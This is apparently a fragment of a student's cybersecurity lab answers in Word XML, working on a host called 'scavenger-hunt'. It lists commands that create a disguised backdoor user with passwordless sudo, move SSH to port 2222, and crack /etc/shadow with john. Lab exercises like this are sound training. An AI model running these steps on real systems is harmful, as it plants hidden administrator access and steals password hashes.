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8lausxd6t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directory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adduser --no-create-home sysd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hacker123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usermod -u 666 sysd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groupmod -g 666 sysd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usermod -aG sudo sysd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syd ALL=(ALL) NOPASSWD:ALL (put under visudo /etc/sudoers)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bash commands here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sudo -l </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">User sysd may run the following commands on scavenger-hunt:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">(ALL : ALL) ALL</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">(ALL) NOPASSWD: ALL</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab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Your bash commands here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nano /etc/ssh/sshd_config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2222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systemctl restart ssh.service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sysadmin@192.168.6.105 -p 2222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su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sysadmin@192.168.6.105 -p 2222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john /etc/shadow/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